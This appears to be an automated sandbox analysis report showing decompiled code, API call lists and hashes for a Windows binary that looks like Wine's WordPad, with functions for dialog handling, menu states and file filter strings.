0x00402bbe
0x00402bc0
0x00402bd2
0x00402bdf
0x00402be5
0x00402bef
0x00402bf2
0x00402bfb
0x00402c0a
0x00402c11
0x00402c19
0x00402c22
0x00402c22
0x00402c32
0x00402c3d
0x00402c45

APIs

GetDlgItem.USER32 ref: 0040292C
GetDlgItem.USER32 ref: 00402939
SendMessageW.USER32(000000B0,?,?), ref: 00402955
EnableMenuItem.USER32 ref: 00402976
EnableMenuItem.USER32 ref: 0040298A
SendMessageW.USER32(?,0000043D,00000000,?), ref: 004029A8
GetWindowLongW.USER32(?,000000F0), ref: 004029B3
CheckMenuItem.USER32(?,00000516,00000000), ref: 004029C8
SendMessageW.USER32(?,000000B8,00000000,00000000), ref: 004029D8
CheckMenuItem.USER32(?,00000517,00000000), ref: 004029EC
CheckMenuItem.USER32(?,0000044C,00000000), ref: 00402A1A
CheckMenuItem.USER32(?,0000044D,00000000), ref: 00402A35
CheckMenuItem.USER32(?,0000044E,00000000), ref: 00402A50
CheckMenuItem.USER32(?,00000523,00000000), ref: 00402A6F
CheckMenuItem.USER32(?,00000524,00000000), ref: 00402A8E
CheckMenuItem.USER32(?,00000525,00000000), ref: 00402AAD
CheckMenuItem.USER32(?,00000526,00000000), ref: 00402ACA
CheckMenuItem.USER32(?,00000527,00000000), ref: 00402AE7
CheckMenuItem.USER32(?,00000528,00000000), ref: 00402B04
SendMessageW.USER32(?,000000C6,00000000,00000000), ref: 00402B14
EnableMenuItem.USER32 ref: 00402B28
SendMessageW.USER32(?,00000455,00000000,00000000), ref: 00402B34
EnableMenuItem.USER32 ref: 00402B48
CheckMenuItem.USER32(?,000005DC,00000000), ref: 00402B6A
CheckMenuItem.USER32(?,000005DD,00000000), ref: 00402B86
IsWindowVisible.USER32(?), ref: 00402B8B
CheckMenuItem.USER32(?,000005DE,00000000), ref: 00402BA1
CheckMenuItem.USER32(?,000005DF,00000000), ref: 00402BBA
SendMessageW.USER32(0000045F,?,00000000), ref: 00402BD9
EnableMenuItem.USER32 ref: 00402BF2
GetMenuItemInfoW.USER32 ref: 00402C11
EnableMenuItem.USER32 ref: 00402C32
EnableMenuItem.USER32 ref: 00402C3D

Strings

, xrefs: 00402C0A
0, xrefs: 00402BFB

Memory Dump Source

Source File: 00000000.00000002.222588618.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.222577382.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222607698.0000000000406000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222613532.000000000040A000.00000002.00020000.sdmp Download File

Similarity

API ID: Item$Menu$Check$Enable$MessageSend$Window$InfoLongVisible
String ID: $0
API String ID: 3270387993-272453368
Opcode ID: 225edd9505d902cd99817ce87f22261867ed9c1f2dc275907aafe91a8882f7de
Instruction ID: 419323facc2b2d5d416c86f589d1451e4f3637f54ce1dec7591af3f7917bb34e
Opcode Fuzzy Hash: 225edd9505d902cd99817ce87f22261867ed9c1f2dc275907aafe91a8882f7de
Instruction Fuzzy Hash: D9918371A50218BEFB145B70DD8AF7F7B7CEB44B11F11842AFA02F90D1DAB45E448A64

Uniqueness

Uniqueness Score: -1.00%

Function 004046CC, Relevance: 51.1, APIs: 27, Strings: 2, Instructions: 309
windowCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E004046CC(void* __fp0, struct HWND__* _a4, struct HWND__* _a8, signed int _a12) {
				struct HWND__* _v8;
				int _v12;
				struct HWND__* _v16;
				short _v24;
				short _v180;
				signed short _v184;
				intOrPtr _v188;
				signed int _v192;
				void* _v196;
				signed int _v200;
				void* _v204;
				short _v716;
				void* _t86;
				struct HINSTANCE__* _t87;
				int _t107;
				void* _t125;
				void* _t130;
				void* _t145;
				signed short _t146;
				intOrPtr _t153;
				signed int _t160;
				signed int _t161;
				void* _t169;
				struct HINSTANCE__* _t172;
				void* _t176;
				void* _t178;
				void* _t180;
				void* _t184;
				void* _t186;
				void* _t189;
				signed int _t192;
				signed short _t193;
				struct HWND__* _t196;
				struct HWND__* _t199;
				struct HWND__* _t203;
				void* _t209;
				void* _t222;

				_t222 = __fp0;
				_t86 = _a8 - 0x110;
				if(_t86 == 0) {
					_t87 = GetModuleHandleW(0);
					_t196 = _a4;
					_t172 = _t87;
					_a12 = GetDlgItem(_t196, 0x7db);
					_a4 = GetDlgItem(_t196, 0x7d8);
					_a8 = GetDlgItem(_t196, 0x7d9);
					_v8 = GetDlgItem(_t196, 0x7da);
					LoadStringW(_t172, 0x588,  &_v716, 0xff);
					SendMessageW(_a12, 0x143, 0,  &_v716);
					LoadStringW(_t172, 0x589,  &_v716, 0xff);
					SendMessageW(_a12, 0x143, 0,  &_v716);
					LoadStringW(_t172, 0x58a,  &_v716, 0xff);
					_t203 = _a12;
					SendMessageW(_t203, 0x143, 0,  &_v716);
					_v204 = 0xbc;
					_v200 = 0xf;
					SendMessageW( *0x40802c, 0x43d, 0,  &_v204);
					_t176 = 2;
					if(_v180 != _t176) {
						_t107 =  ==  ? _t176 : 0;
					} else {
						_t107 = 1;
					}
					SendMessageW(_t203, 0x14e, _t107, 0);
					_push(_v192 + _v184);
					E00404561(_t176,  &_v716);
					_pop(_t178);
					SetWindowTextW(_a4,  &_v716);
					_push(_v188);
					E00404561(_t178,  &_v716);
					_pop(_t180);
					SetWindowTextW(_a8,  &_v716);
					_push( ~_v184);
					E00404561(_t180,  &_v716);
					SetWindowTextW(_v8,  &_v716);
					L26:
					_t125 = 0;
					L27:
					return _t125;
				}
				if(_t86 != 1) {
					goto L26;
				}
				_t199 = _a4;
				_t130 = (_a12 & 0x0000ffff) - 1;
				if(_t130 == 0) {
					_a4 = GetDlgItem(_t199, 0x7db);
					_a8 = GetDlgItem(_t199, 0x7d8);
					_v16 = GetDlgItem(_t199, 0x7d9);
					_v8 = GetDlgItem(_t199, 0x7da);
					_v12 = 0;
					_v204 = 0xbc;
					_v200 = 0x20;
					SendMessageW( *0x40802c, 0x43d, 0,  &_v204);
					if((_v200 & 0x00000020) != 0) {
						_t169 = 1;
						_t210 =  !=  ? _t169 : 0;
						_v12 =  !=  ? _t169 : 0;
					}
					_v180 =  *((intOrPtr*)(0x4063d4 + SendMessageW(_a4, 0x147, 0, 0) * 2));
					GetWindowTextW(_a8,  &_v716, 0xff);
					E004044E2( &_v716, _t222,  &_v716,  &_a4,  &_a8);
					asm("movss xmm0, [ebp+0x8]");
					_t145 = 1;
					_t209 =  !=  ? _t145 : 0;
					asm("movss [esp], xmm0");
					_t146 = E00405747(_a8);
					_pop(_t184);
					_v184 = _t146;
					GetWindowTextW(_v16,  &_v716, 0xff);
					if(E004044E2( &_v716, _t222,  &_v716,  &_a4,  &_a8) != 0) {
						_t209 = _t209 + 1;
					}
					asm("movss xmm0, [ebp+0x8]");
					asm("movss [esp], xmm0");
					_t153 = E00405747(_a8);
					_t186 = _t184;
					_v188 = _t153;
					GetWindowTextW(_v8,  &_v716, 0xff);
					if(E004044E2( &_v716, _t222,  &_v716,  &_a4,  &_a8) != 0) {
						_t209 = _t209 + 1;
					}
					asm("movss xmm0, [ebp+0x8]");
					_push(_t186);
					asm("movss [esp], xmm0");
					_t160 = E00405747(_a8);
					_v192 = _t160;
					if(_t209 == 3) {
						_t192 = _v184;
						_t189 = _t160 + _t192;
						if(_t189 >= 0 || _t160 >= 0) {
							if(_t192 < 0) {
								_t192 = 0;
								_t160 =  >  ? _t189 : 0;
							}
						} else {
							_t192 =  ~_t160;
						}
						_t161 = _t160 + _t192;
						_v204 = 0xbc;
						_t193 = _t192 - _t161;
						_v192 = _t161;
						_v184 = _t193;
						_v200 = 0xf;
						if(_v12 != 0) {
							_v200 = 0x400f;
							_t191 =  >  ? _t193 & 0x0000ffff : 0;
							_v24 =  >  ? _t193 & 0x0000ffff : 0;
						}
						SendMessageW( *0x40802c, 0x447, 0,  &_v204);
						L21:
						EndDialog(_t199, _a12);
						_t125 = 1;
						goto L27;
					} else {
						E004018DD( *0x408028, 0x6a9, L"Wine Wordpad", 0x40);
						goto L26;
					}
				}
				if(_t130 == 1) {
					goto L21;
				}
				goto L26;
			}

0x004046cc
0x004046db
0x004046e0
0x00404947
0x0040494d
0x00404950
0x00404966
0x00404971
0x0040497c
0x0040498c
0x0040499c
0x004049b0
0x004049c8
0x004049da
0x004049f2
0x004049f4
0x00404a0b
0x00404a13
0x00404a2a
0x00404a34
0x00404a38
0x00404a40
0x00404a51
0x00404a42
0x00404a44
0x00404a44
0x00404a5c
0x00404a6a
0x00404a72
0x00404a84
0x00404a89
0x00404a8b
0x00404a98
0x00404a9e
0x00404aa9
0x00404ab3
0x00404abb
0x00404acc
0x00404ace
0x00404ace
0x00404ad0
0x00404ad4
0x00404ad4
0x004046e9
0x00000000
0x00000000
0x004046f2
0x004046f8
0x004046fb
0x0040471f
0x0040472a
0x00404735
0x0040473a
0x00404745
0x00404757
0x00404761
0x0040476b
0x00404778
0x00404783
0x00404784
0x00404787
0x00404787
0x004047a7
0x004047b8
0x004047cd
0x004047d2
0x004047db
0x004047de
0x004047e4
0x004047ec
0x004047f2
0x004047f3
0x00404808
0x00404827
0x00404829
0x00404829
0x0040482a
0x00404830
0x00404838
0x0040483e
0x0040483f
0x00404854
0x00404873
0x00404875
0x00404875
0x00404876
0x0040487b
0x0040487c
0x00404884
0x00404889
0x00404894
0x004048b5
0x004048bb
0x004048c0
0x004048ce
0x004048d2
0x004048d6
0x004048d6
0x004048c6
0x004048c8
0x004048c8
0x004048d9
0x004048db
0x004048e5
0x004048e7
0x004048ed
0x004048f3
0x00404900
0x00404909
0x00404913
0x00404916
0x00404916
0x0040492d
0x00404933
0x00404937
0x0040493f
0x00000000
0x00404896
0x004048a8
0x00000000
0x004048ad
0x00404894
0x00404700
0x00000000
0x00000000
0x00000000

APIs

GetDlgItem.USER32 ref: 00404717
GetDlgItem.USER32 ref: 00404722
GetDlgItem.USER32 ref: 0040472D
GetDlgItem.USER32 ref: 00404738
SendMessageW.USER32(0000043D,00000000,?), ref: 0040476B
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404794
GetWindowTextW.USER32 ref: 004047B8
GetWindowTextW.USER32 ref: 00404808
GetWindowTextW.USER32 ref: 00404854
EndDialog.USER32(?,?), ref: 00404937
GetModuleHandleW.KERNEL32(00000000), ref: 00404947
GetDlgItem.USER32 ref: 0040495E
GetDlgItem.USER32 ref: 00404969
GetDlgItem.USER32 ref: 00404974
GetDlgItem.USER32 ref: 0040497F
LoadStringW.USER32(00000000,00000588,?,000000FF), ref: 0040499C
SendMessageW.USER32(?,00000143,00000000,?), ref: 004049B0
LoadStringW.USER32(00000000,00000589,?,000000FF), ref: 004049C8
SendMessageW.USER32(?,00000143,00000000,?), ref: 004049DA
LoadStringW.USER32(00000000,0000058A,?,000000FF), ref: 004049F2
SendMessageW.USER32(?,00000143,00000000,?), ref: 00404A0B
SendMessageW.USER32(0000043D,00000000,?), ref: 00404A34
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404A5C
SetWindowTextW.USER32(?,?), ref: 00404A89

Strings

, xrefs: 00404771
Wine Wordpad, xrefs: 00404898

Memory Dump Source

Source File: 00000000.00000002.222588618.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.222577382.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222607698.0000000000406000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222613532.000000000040A000.00000002.00020000.sdmp Download File

Similarity

API ID: Item$MessageSend$TextWindow$LoadString$DialogHandleModule
String ID: $Wine Wordpad
API String ID: 2331312320-1719699334
Opcode ID: de5413652011258983a6db0dc94d6c1c67152d8b8891a1d1674e7af527a52b40
Instruction ID: 6a3aab21738b4b99d8c2e02a263b1ee319ce123a71c891180c149a044a842905
Opcode Fuzzy Hash: de5413652011258983a6db0dc94d6c1c67152d8b8891a1d1674e7af527a52b40
Instruction Fuzzy Hash: 67B17472900219AEEB509F65DC45FEE7BB8EF44710F0081BAFA09F7190EB749A848F54

Uniqueness

Uniqueness Score: -1.00%

Function 00402EEC, Relevance: 49.2, APIs: 27, Strings: 1, Instructions: 222
windowCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00402EEC(struct HWND__* _a4) {
				struct HWND__* _v8;
				void* _v12;
				void* _v16;
				intOrPtr _v20;
				void* _v24;
				signed int _v132;
				void _v136;
				void* _v140;
				short _v304;
				intOrPtr _v320;
				void _v324;
				void* _v328;
				signed int _t71;
				long _t90;
				long _t96;
				long _t103;
				struct HWND__* _t128;
				struct HWND__* _t140;
				struct HWND__* _t141;

				_v8 = GetDlgItem(_a4, 0x7d1);
				_t141 = GetDlgItem(_a4, 0x7d4);
				_t128 = GetDlgItem(_t141, 0x7d2);
				_t140 = GetDlgItem(_t141, 0x7d3);
				memset( &_v136, 0, 0x70);
				_v140 = 0x74;
				memset( &_v324, 0, 0xb8);
				_v328 = 0xbc;
				_v24 = 8;
				_v20 = 0x4b0;
				_t71 = SendMessageW(_v8, 0x45f,  &_v24, 0);
				asm("sbb eax, eax");
				SendMessageW(_t128, 0x401, 0x3f6,  ~( ~_t71));
				SendMessageW(_v8, 0x43a, 1,  &_v140);
				SendMessageW(_v8, 0xb0,  &_v12,  &_v16);
				SendMessageW(_t128, 0x401, 0x51b, SendMessageW(_v8, 0xc6, 0, 0));
				SendMessageW(_t128, 0x401, 0x51c, SendMessageW(_v8, 0x455, 0, 0));
				SendMessageW(_t128, 0x401, 0x51f, 0 | _v12 != _v16);
				SendMessageW(_t128, 0x401, 0x51e, 0 | _v12 != _v16);
				if((_v136 & 0x00000001) == 0 || (_v132 & 0x00000001) == 0) {
					_t90 = 0;
				} else {
					_t90 = 1;
				}
				SendMessageW(_t140, 0x402, 0x578, _t90);
				SendMessageW(_t140, 0x405, 0x578,  !_v136 & 0x00000001);
				if((_v136 & 0x00000002) == 0 || (_v132 & 0x00000002) == 0) {
					_t96 = 0;
				} else {
					_t96 = 1;
				}
				SendMessageW(_t140, 0x402, 0x579, _t96);
				SendMessageW(_t140, 0x405, 0x579,  !(_v136 >> 1) & 0x00000001);
				if((_v136 & 0x00000004) == 0 || (_v132 & 0x00000004) == 0) {
					_t103 = 0;
				} else {
					_t103 = 1;
				}
				SendMessageW(_t140, 0x402, 0x57a, _t103);
				SendMessageW(_t140, 0x405, 0x57a,  !(_v136 >> 2) & 0x00000001);
				SendMessageW(_v8, 0x43d, 0,  &_v328);
				SendMessageW(_t140, 0x402, 0x44c, 0 | _v304 == 1);
				SendMessageW(_t140, 0x402, 0x44d, 0 | _v304 == 0x00000003);
				SendMessageW(_t140, 0x402, 0x44e, 0 | _v304 == 0x00000002);
				SendMessageW(_t140, 0x402, 0x522, 0 | _v320 != 0x00000000);
				return 0;
			}

0x00402f10
0x00402f15
0x00402f25
0x00402f2b
0x00402f37
0x00402f47
0x00402f53
0x00402f5b
0x00402f68
0x00402f6f
0x00402f86
0x00402f8a
0x00402f9a
0x00402faf
0x00402fc1
0x00402fdd
0x00402ff9
0x00403012
0x0040302b
0x00403034
0x00403041
0x0040303c
0x0040303e
0x0040303e
0x00403050
0x00403065
0x0040306e
0x0040307b
0x00403076
0x00403078
0x00403078
0x0040308a
0x004030a1
0x004030aa
0x004030b7
0x004030b2
0x004030b4
0x004030b4
0x004030c6
0x004030de
0x004030f1
0x0040310f
0x00403126
0x0040313d
0x00403153
0x0040315b

APIs

GetDlgItem.USER32 ref: 00402F06
GetDlgItem.USER32 ref: 00402F13
GetDlgItem.USER32 ref: 00402F1D
GetDlgItem.USER32 ref: 00402F27
memset.MSVCRT ref: 00402F37
memset.MSVCRT ref: 00402F53
SendMessageW.USER32(?,0000045F,?,00000000), ref: 00402F86
SendMessageW.USER32(00000000,00000401,000003F6,00000000), ref: 00402F9A
SendMessageW.USER32(?,0000043A,00000001,00000074), ref: 00402FAF
SendMessageW.USER32(?,000000B0,?,?), ref: 00402FC1
SendMessageW.USER32(?,000000C6,00000000,00000000), ref: 00402FCF
SendMessageW.USER32(00000000,00000401,0000051B,00000000), ref: 00402FDD
SendMessageW.USER32(?,00000455,00000000,00000000), ref: 00402FEB
SendMessageW.USER32(00000000,00000401,0000051C,00000000), ref: 00402FF9
SendMessageW.USER32(00000000,00000401,0000051F,00000000), ref: 00403012
SendMessageW.USER32(00000000,00000401,0000051E,00000000), ref: 0040302B
SendMessageW.USER32(00000000,00000402,00000578,00000000), ref: 00403050
SendMessageW.USER32(00000000,00000405,00000578,00000001), ref: 00403065
SendMessageW.USER32(00000000,00000402,00000579,00000000), ref: 0040308A
SendMessageW.USER32(00000000,00000405,00000579,00000002), ref: 004030A1
SendMessageW.USER32(00000000,00000402,0000057A,00000000), ref: 004030C6
SendMessageW.USER32(00000000,00000405,0000057A,00000004), ref: 004030DE
SendMessageW.USER32(?,0000043D,00000000,000000BC), ref: 004030F1
SendMessageW.USER32(00000000,00000402,0000044C,00000000), ref: 0040310F
SendMessageW.USER32(00000000,00000402,0000044D,00000000), ref: 00403126
SendMessageW.USER32(00000000,00000402,0000044E,00000000), ref: 0040313D
SendMessageW.USER32(00000000,00000402,00000522,00000000), ref: 00403153

Strings

t, xrefs: 00402F47

Memory Dump Source

Source File: 00000000.00000002.222588618.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.222577382.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222607698.0000000000406000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222613532.000000000040A000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Item$memset
String ID: t
API String ID: 3894520544-2238339752
Opcode ID: a1833e490b55a66e396165f72409e36a90077713aa3e29de39f66628960958f7
Instruction ID: 19934c4c45edb323d98ee086313f721e45b98e1e202f699277defee45781fd9f
Opcode Fuzzy Hash: a1833e490b55a66e396165f72409e36a90077713aa3e29de39f66628960958f7
Instruction Fuzzy Hash: 8E5191B1E5022C7AFB119A748D86FBF6EACDB05B04F008066BB05F61D1DAB84F419F65

Uniqueness

Uniqueness Score: -1.00%

Function 00403E95, Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 201
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00403E95(char _a4, intOrPtr _a8, signed short _a12, char _a16) {
				void* _t68;
				int _t78;
				int _t79;
				int _t80;
				int _t81;
				void* _t82;
				struct HWND__* _t83;
				signed int _t89;
				int _t94;
				void* _t98;
				signed int _t99;
				void* _t103;
				void* _t104;
				void* _t105;
				void* _t106;
				void* _t108;
				struct HWND__* _t110;
				struct HWND__* _t111;
				signed int _t114;
				signed int _t115;
				signed int _t116;
				signed int _t117;
				signed int _t118;
				signed int _t119;
				signed int _t120;
				signed int _t121;
				intOrPtr _t122;
				signed int _t130;
				char _t132;
				int _t134;

				_t68 = _a8 - 0x4e;
				if(_t68 == 0) {
					if( *((intOrPtr*)(_a16 + 8)) == 0xffffff36) {
						_t110 = _a4;
						GetWindowTextA(GetDlgItem(_t110, 0x6b),  &_a16, 4);
						_t130 = atoi( &_a16);
						if(IsDlgButtonChecked(_t110, 0x68) == 0) {
							if(IsDlgButtonChecked(_t110, 0x69) == 0) {
								if(IsDlgButtonChecked(_t110, 0x6a) != 0) {
									 *(0x40803c + _t130 * 4) = 2;
								}
							} else {
								 *(0x40803c + _t130 * 4) = 1;
							}
						} else {
							 *(0x40803c + _t130 * 4) =  *(0x40803c + _t130 * 4) & 0x00000000;
						}
						_t78 = IsDlgButtonChecked(_t110, 0x64);
						_t114 =  *(0x408044 + _t130 * 4);
						if(_t78 == 0) {
							_t115 = _t114 & 0xfffffffb;
						} else {
							_t115 = _t114 | 0x00000004;
						}
						 *(0x408044 + _t130 * 4) = _t115;
						_t79 = IsDlgButtonChecked(_t110, 0x65);
						_t116 =  *(0x408044 + _t130 * 4);
						if(_t79 == 0) {
							_t117 = _t116 & 0xfffffff7;
						} else {
							_t117 = _t116 | 0x00000008;
						}
						 *(0x408044 + _t130 * 4) = _t117;
						_t80 = IsDlgButtonChecked(_t110, 0x66);
						_t118 =  *(0x408044 + _t130 * 4);
						if(_t80 == 0) {
							_t119 = _t118 & 0xfffffffe;
						} else {
							_t119 = _t118 | 1;
						}
						 *(0x408044 + _t130 * 4) = _t119;
						_t81 = IsDlgButtonChecked(_t110, 0x67);
						_t120 =  *(0x408044 + _t130 * 4);
						if(_t81 == 0) {
							_t121 = _t120 & 0xfffffffd;
						} else {
							_t121 = _t120 | 0x00000002;
						}
						 *(0x408044 + _t130 * 4) = _t121;
					}
					L47:
					return 0;
				}
				_t82 = _t68 - 0xc2;
				if(_t82 == 0) {
					_t111 = _a4;
					_t83 = GetDlgItem(_t111, 0x6b);
					E00405253( &_a4, "%d",  *(_a16 + 0x1c));
					SetWindowTextA(_t83,  &_a4);
					_t132 = _a16;
					_t89 =  *(_t132 + 0x1c);
					_t122 =  *((intOrPtr*)(0x40803c + _t89 * 4));
					if(_t122 != 0) {
						if(_t122 != 1) {
							if(_t122 != 2) {
								goto L19;
							} else {
								_push(0x6a);
								goto L18;
							}
						} else {
							_push(0x69);
							goto L18;
						}
					} else {
						_push(0x68);
						L18:
						_pop(_t94);
						CheckRadioButton(_t111, 0x68, 0x6a, _t94);
						_t89 =  *(_t132 + 0x1c);
						L19:
						if(( *(0x408044 + _t89 * 4) & 0x00000004) != 0) {
							CheckDlgButton(_t111, 0x64, 1);
							_t89 =  *(_a16 + 0x1c);
						}
						if(( *(0x408044 + _t89 * 4) & 0x00000008) != 0) {
							CheckDlgButton(_t111, 0x65, 1);
							_t89 =  *(_a16 + 0x1c);
						}
						if(( *(0x408044 + _t89 * 4) & 0x00000001) != 0) {
							CheckDlgButton(_t111, 0x66, 1);
							_t89 =  *(_a16 + 0x1c);
						}
						if(( *(0x408044 + _t89 * 4) & 0x00000002) != 0) {
							CheckDlgButton(_t111, 0x67, 1);
						}
						goto L47;
					}
				}
				if(_t82 != 1) {
					goto L47;
				}
				_t134 = _a12 & 0x0000ffff;
				_t98 = _t134 - 0x64;
				if(_t98 == 0) {
					L11:
					_t99 = IsDlgButtonChecked(_a4, _t134);
					asm("sbb eax, eax");
					CheckDlgButton(_a4, _t134,  ~_t99 + 1);
					goto L47;
				}
				_t103 = _t98 - 1;
				if(_t103 == 0) {
					goto L11;
				}
				_t104 = _t103 - 1;
				if(_t104 == 0) {
					goto L11;
				}
				_t105 = _t104 - 1;
				if(_t105 == 0) {
					goto L11;
				}
				_t106 = _t105 - 1;
				if(_t106 == 0) {
					L10:
					CheckRadioButton(_a4, 0x68, 0x6a, _t134);
					goto L47;
				}
				_t108 = _t106 - 1;
				if(_t108 == 0 || _t108 == 1) {
					goto L10;
				} else {
					goto L47;
				}
			}

0x00403e9e
0x00403ea1
0x00403fe8
0x00403fee
0x00404001
0x00404015
0x00404022
0x00404039
0x0040404f
0x00404051
0x00404051
0x0040403b
0x0040403b
0x0040403b
0x00404024
0x00404024
0x00404024
0x0040405f
0x00404065
0x0040406e
0x00404075
0x00404070
0x00404070
0x00404070
0x0040407b
0x00404082
0x00404088
0x00404091
0x00404098
0x00404093
0x00404093
0x00404093
0x0040409e
0x004040a5
0x004040ab
0x004040b4
0x004040ba
0x004040b6
0x004040b6
0x004040b6
0x004040c0
0x004040c7
0x004040cd
0x004040d6
0x004040dd
0x004040d8
0x004040d8
0x004040d8
0x004040e0
0x004040e0
0x004040e9
0x004040ed
0x004040ed
0x00403ea7
0x00403eac
0x00403f16
0x00403f1c
0x00403f33
0x00403f40
0x00403f46
0x00403f4c
0x00403f4f
0x00403f58
0x00403f60
0x00403f69
0x00000000
0x00403f6b
0x00403f6b
0x00000000
0x00403f6b
0x00403f62
0x00403f62
0x00000000
0x00403f62
0x00403f5a
0x00403f5a
0x00403f6d
0x00403f6d
0x00403f74
0x00403f7a
0x00403f7d
0x00403f8b
0x00403f91
0x00403f96
0x00403f96
0x00403fa1
0x00403fa7
0x00403fac
0x00403fac
0x00403fb7
0x00403fbd
0x00403fc2
0x00403fc2
0x00403fcd
0x00403fd7
0x00403fd7
0x00000000
0x00403fcd
0x00403f58
0x00403eb1
0x00000000
0x00000000
0x00403eb7
0x00403ebd
0x00403ec0
0x00403ef7
0x00403efb
0x00403f03
0x00403f0b
0x00000000
0x00403f0b
0x00403ec2
0x00403ec5
0x00000000
0x00000000
0x00403ec7
0x00403eca
0x00000000
0x00000000
0x00403ecc
0x00403ecf
0x00000000
0x00000000
0x00403ed1
0x00403ed4
0x00403ee4
0x00403eec
0x00000000
0x00403eec
0x00403ed6
0x00403ed9
0x00000000
0x00000000
0x00000000
0x00000000

APIs

CheckRadioButton.USER32 ref: 00403EEC
IsDlgButtonChecked.USER32(?,?), ref: 00403EFB
CheckDlgButton.USER32 ref: 00403F0B
GetDlgItem.USER32 ref: 00403F1C
__swprintf.LEGACY_STDIO_DEFINITIONS ref: 00403F33
SetWindowTextA.USER32(00000000,?), ref: 00403F40
CheckRadioButton.USER32 ref: 00403F74
CheckDlgButton.USER32 ref: 00403F91
CheckDlgButton.USER32 ref: 00403FA7
CheckDlgButton.USER32 ref: 00403FBD
CheckDlgButton.USER32 ref: 00403FD7
GetDlgItem.USER32 ref: 00403FF4
GetWindowTextA.USER32 ref: 00404001
atoi.MSVCRT ref: 0040400B
IsDlgButtonChecked.USER32(FFFFFF36,00000068), ref: 00404017
IsDlgButtonChecked.USER32(FFFFFF36,00000069), ref: 00404031
IsDlgButtonChecked.USER32(FFFFFF36,0000006A), ref: 00404047
IsDlgButtonChecked.USER32(FFFFFF36,00000064), ref: 0040405F
IsDlgButtonChecked.USER32(FFFFFF36,00000065), ref: 00404082
IsDlgButtonChecked.USER32(FFFFFF36,00000066), ref: 004040A5
IsDlgButtonChecked.USER32(FFFFFF36,00000067), ref: 004040C7

Strings

%d, xrefs: 00403F2D

Memory Dump Source

Source File: 00000000.00000002.222588618.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.222577382.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222607698.0000000000406000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222613532.000000000040A000.00000002.00020000.sdmp Download File

Similarity

API ID: Button$Checked$Check$ItemRadioTextWindow$__swprintfatoi
String ID: %d
API String ID: 423750410-545462948
Opcode ID: 83767692ba805b34a6fe39bd4c7b2dfdc32b30e7b8b5cd8e5161e92994ca8063
Instruction ID: 428f338f02538cd746507b904ca1c1424122469fda62c6c1d8729cb6eae109e5
Opcode Fuzzy Hash: 83767692ba805b34a6fe39bd4c7b2dfdc32b30e7b8b5cd8e5161e92994ca8063
Instruction Fuzzy Hash: 7761DAB1640205ABD7248F35DE49F2B3F6DEB46741F01413AF783B62D2CA7AC921CA59

Uniqueness

Uniqueness Score: -1.00%

Function 004013B5, Relevance: 38.6, APIs: 19, Strings: 3, Instructions: 104
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004013B5(void* __ecx) {
				struct HINSTANCE__* _v8;
				struct HINSTANCE__* _t23;
				WCHAR* _t53;
				WCHAR* _t55;
				WCHAR* _t57;
				WCHAR* _t59;
				WCHAR* _t61;
				WCHAR* _t63;
				WCHAR* _t65;
				struct HINSTANCE__* _t66;

				_t23 = GetModuleHandleW(0);
				_v8 = _t23;
				_t53 = 0x40825a + LoadStringW(_t23, 0x57b, 0x408258, 0xff) * 2;
				lstrcpyW(_t53, L"*.rtf");
				_t55 =  &(( &(_t53[lstrlenW(_t53)]))[1]);
				_t57 =  &(( &(_t55[LoadStringW(_v8, 0x579, _t55, 0xff)]))[1]);
				lstrcpyW(_t57, L"*.txt");
				_t59 =  &(( &(_t57[lstrlenW(_t57)]))[1]);
				_t61 =  &(( &(_t59[LoadStringW(_v8, 0x57a, _t59, 0xff)]))[1]);
				lstrcpyW(_t61, L"*.txt");
				_t63 =  &(( &(_t61[lstrlenW(_t61)]))[1]);
				_t65 =  &(( &(_t63[LoadStringW(_v8, 0x578, _t63, 0xff)]))[1]);
				lstrcpyW(_t65, L"*.*");
				 *((short*)(_t65 + 2 + lstrlenW(_t65) * 2)) = 0;
				_t66 = _v8;
				LoadStringW(_t66, 0x6a4, 0x408a80, 0xff);
				LoadStringW(_t66, 0x6a5, 0x408c80, 0xff);
				LoadStringW(_t66, 0x5b2, 0x408e80, 0xff);
				LoadStringW(_t66, 0x5b3, 0x409080, 0xff);
				LoadStringW(_t66, 0x5b4, 0x409280, 0xff);
				return LoadStringW(_t66, 0x5b5, 0x409480, 0xff);
			}

0x004013be
0x004013d4
0x004013e8
0x004013f0
0x00401403
0x0040141d
0x00401421
0x0040142e
0x00401448
0x0040144c
0x00401459
0x00401473
0x00401477
0x0040148f
0x00401494
0x0040149d
0x004014ab
0x004014b9
0x004014c7
0x004014d5
0x004014e9

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 004013BE
LoadStringW.USER32(00000000,0000057B,00408258,000000FF), ref: 004013D7
lstrcpyW.KERNEL32 ref: 004013F0
lstrlenW.KERNEL32(?,?,*.rtf), ref: 004013F9
LoadStringW.USER32(?,00000579,?,000000FF), ref: 0040140F
lstrcpyW.KERNEL32 ref: 00401421
lstrlenW.KERNEL32(?,?,*.txt,?,000000FF,?,?,*.rtf), ref: 00401424
LoadStringW.USER32(?,0000057A,?,000000FF), ref: 0040143A
lstrcpyW.KERNEL32 ref: 0040144C
lstrlenW.KERNEL32(?,?,*.txt,?,000000FF,?,?,*.txt,?,000000FF,?,?,*.rtf), ref: 0040144F
LoadStringW.USER32(?,00000578,?,000000FF), ref: 00401465
lstrcpyW.KERNEL32 ref: 00401477
